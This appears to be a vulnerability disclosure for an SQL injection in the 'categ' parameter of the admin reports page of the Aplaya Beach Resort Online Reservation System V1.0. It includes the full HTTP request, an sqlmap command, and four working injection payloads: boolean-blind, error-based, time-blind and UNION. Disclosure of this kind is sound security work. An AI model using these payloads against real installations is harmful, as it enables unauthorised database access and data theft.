Vulnerability discovery author:Qianyongcun

Aplaya Beach Resort Online Reservation System - SQL Injection on(admin/mod_reports/index.php categ parameter) 

Vendor Homepage:
https://www.sourcecodester.com/aplaya-beach-resort-online-reservation-system.html 

Version:V1.0
Tested on: PHP, Apache, MySQL

Affected Page:
admin/mod_reports/index.php
On this page, categ parameter is vulnerable to SQL Injection Attack 
Proof of vulnerability(Verify using the sqlmap tool after logining):

Request:
POST /aplaya/admin/mod_reports/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 144
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=g883r0l08f296hfd9582abk9v0
Origin: http://localhost
Referer: http://localhost/aplaya/admin/mod_reports/index.php
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

categ=1=&start=2024-04-04&submit=

-> sqlmap -r(above request package) --batch

Output:
---
Parameter: categ (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: categ=-4457' OR 7152=7152#&start=2024-04-04&submit=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: categ=1=' OR (SELECT 6366 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(6366=6366,1))),0x716b717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Sbkg&start=2024-04-04&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: categ=1=' AND (SELECT 9595 FROM (SELECT(SLEEP(5)))hwDH)-- HDFH&start=2024-04-04&submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 31 columns
    Payload: categ=1=' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a6271,0x764a4b525977426c6855654b7a506766736341784f676c4b6a6f414671726f5a4d686d6b74634170,0x716b717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&start=2024-04-04&submit=
---
